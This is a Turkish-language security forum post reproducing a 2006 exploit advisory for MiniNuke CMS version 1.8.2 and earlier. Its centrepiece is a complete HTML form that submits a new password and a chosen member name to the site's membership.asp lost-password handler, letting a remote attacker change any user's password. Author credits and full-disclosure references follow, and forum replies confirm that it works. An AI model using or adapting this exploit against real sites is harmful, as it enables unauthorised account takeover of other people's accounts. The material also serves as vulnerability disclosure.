Bilişim Güvenliği
Mininuke CMS System <= 1.8.2 (Membership.Asp) Remote User Password Change Exploit
Mininuke CMS System <= 1.8.2 (Membership.Asp) Remote User Password Change Exploit
-
--Güvenlik Raporu--
Nedir: MiniNuke CMS System <= 1.8.2 (membership.asp) remote user password change exploit
---
Yazar: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Tarih: 12/01/06 08:49 PM
---
Kontaklar:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web: http://www.nukedx.com
}
---
Firma: MiniNuke (www.miniex.net)
Sürüm: 1.8.2 ve muhtemelen alt sürümleri
Hakkında:Bu metod ile uzaktan saldıran bir kişi istediği kullanıcının şifresini değişebilir.
---
Nasıl&Örnek:
HTML Örneği
[code]
<html>
<title>MiniNuke <= 1.8.2 remote user password change</title>
<form method="POST" action="http://[SITE]/membership.asp?action=lostpassnew">
<table border="0" cellspacing="1" cellpadding="0" align="center" width="75%">
<tr><td colspan="2" align="center"><font face=verdana size=2>Now fill in the blanks</font></td></tr>
<tr><td colspan="2" align="center"><font face=tahoma size=1red>Change password </font></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD: </font></td>
<td width="50%"><input type="text" name="pass" size="20"></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD Again : </font></td>
<td width="50%"><input type="text" name="passa" size="20"><input type="text" name="x" value="Membername">
<input type="submit" value="Send" name="B1" style="font-family: Verdana; font-size: 10px; border: 1px ridge #FFFFFF; background-color: #FFFFFF"></td></tr>
</table></form>
</html>
[/code]
--
Saygılar,
NWPX team adına
nuker a.k.a nukedxReferanslar:
http://seclists.org/lists/fulldisclosure/2006/Jan/0442.html
http://www.securityfocus.com/archive/1/421748/30/0/threaded
http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0437.html
-
denendi ve işe yarıyor
güsel çalışma -
admin paneline giriş yapamıyorsun ama o var